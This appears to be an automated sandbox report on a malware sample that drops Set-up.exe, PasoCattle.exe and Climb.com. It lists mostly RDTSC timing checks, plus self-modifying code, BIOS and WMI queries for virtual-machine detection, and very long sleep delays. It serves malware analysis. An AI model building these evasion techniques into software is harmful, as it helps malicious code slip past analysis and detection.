                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11ECAA2 second address: 11ECAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11ECC44 second address: 11ECC68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD6F84FD828h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11ECC68 second address: 11ECC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11ECDB0 second address: 11ECDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD6F84FD816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11ECDBA second address: 11ECDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1ABB second address: 11F1AC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1CA2 second address: 11F1CDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE72h 0x00000008 jmp 00007FD6F84FEE6Ah 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FD6F84FEE73h 0x00000015 jmp 00007FD6F84FEE6Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007FD6F84FEE6Eh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1FBA second address: 11F1FC8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1FC8 second address: 11F1FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1FCC second address: 11F1FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD6F84FD81Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F1FE3 second address: 11F2006 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FD6F84FEE74h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 119734F second address: 11973C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, dword ptr [ebp+122D3904h] 0x00000014 mov edi, dword ptr [ebp+122D33EFh] 0x0000001a mov ebx, dword ptr [ebp+1248050Ah] 0x00000020 mov dx, D14Bh 0x00000024 add eax, ebx 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FD6F84FD818h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov dword ptr [ebp+1247144Fh], ecx 0x00000046 nop 0x00000047 je 00007FD6F84FD822h 0x0000004d jns 00007FD6F84FD81Ch 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD6F84FD827h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F22E1 second address: 11F22F0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F22F0 second address: 11F22F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F53F3 second address: 11F5406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11F5406 second address: 11F540C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FB9E0 second address: 11FB9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FD6F84FEE7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FD6F84FEE66h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FB9F4 second address: 11FB9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FBFC8 second address: 11FBFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FBFCE second address: 11FBFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FBFD2 second address: 11FBFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FC2A1 second address: 11FC2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FC5A8 second address: 11FC5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FD2FE second address: 11FD302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FD5FA second address: 11FD604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 11FD604 second address: 11FD60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1207713 second address: 1207717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1206E25 second address: 1206E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1206E29 second address: 1206E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1206F71 second address: 1206FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD824h 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FD6F84FD828h 0x00000010 jmp 00007FD6F84FD81Eh 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 120742F second address: 1207449 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FD6F84FEE66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 120B0C9 second address: 120B0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 121233F second address: 1212345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212345 second address: 1212358 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD6F84FD816h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212358 second address: 121235D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212648 second address: 1212673 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FD6F84FD816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007FD6F84FD849h 0x00000013 jmp 00007FD6F84FD825h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212D6B second address: 1212D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212D71 second address: 1212D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1212D75 second address: 1212D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD6F84FEE66h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1145363 second address: 114538C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD6F84FD829h 0x0000000c pushad 0x0000000d jp 00007FD6F84FD816h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 122AED0 second address: 122AEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD6F84FEE66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 122AEDA second address: 122AEE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1238718 second address: 1238722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD6F84FEE66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1238722 second address: 1238726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1238726 second address: 1238730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1238730 second address: 1238734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1238590 second address: 12385A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD6F84FEE6Ah 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12385A1 second address: 12385D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD827h 0x00000009 jmp 00007FD6F84FD81Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FD6F84FD816h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12385D3 second address: 12385DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD6F84FEE66h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 123C5F4 second address: 123C5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 123C5F8 second address: 123C625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FEE6Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD6F84FEE76h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 123C625 second address: 123C629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1242D98 second address: 1242DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD6F84FEE66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 124167D second address: 1241683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12417CE second address: 12417DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jp 00007FD6F84FEE66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12418F6 second address: 12418FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1241BE9 second address: 1241BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1241BEF second address: 1241BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1241BF3 second address: 1241BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1242A8A second address: 1242AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD829h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FD6F84FD823h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 125419C second address: 12541AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FEE66h 0x00000008 jp 00007FD6F84FEE66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12574B7 second address: 12574C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FD81Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12574C9 second address: 12574CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12574CD second address: 12574D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12574D9 second address: 12574DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12574DF second address: 12574E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1264FAE second address: 1264FB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1264FB8 second address: 1264FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD6F84FD822h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126C0E6 second address: 126C0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126C0EA second address: 126C0F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126C0F0 second address: 126C107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007FD6F84FEE6Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126C107 second address: 126C10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126B45F second address: 126B47F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE76h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FD6F84FEE6Eh 0x0000000f jc 00007FD6F84FEE6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126B5BD second address: 126B5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126D7E9 second address: 126D7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FD6F84FEE72h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126D7F6 second address: 126D7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 126D7FC second address: 126D800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12770D0 second address: 12770ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FD829h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12770ED second address: 12770FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 12770FB second address: 1277102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1278FF1 second address: 127903E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE78h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e jo 00007FD6F84FEE66h 0x00000014 jnl 00007FD6F84FEE66h 0x0000001a jmp 00007FD6F84FEE77h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FD6F84FEE66h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 127085A second address: 1270860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1191AA2 second address: 1191AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 1191AA6 second address: 1191AAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: FE9A98 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: 118246E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: 11828DB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: 11AF639 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: 121A84E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeSpecial instruction interceptor: First address: FED842 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeMemory allocated: 5990000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeMemory allocated: 5BC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeMemory allocated: 5A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWindow / User API: threadDelayed 5022Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comAPI coverage: 3.7 %
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exe TID: 6460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 6264Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406301 FindFirstFileW,FindClose,2_2_00406301
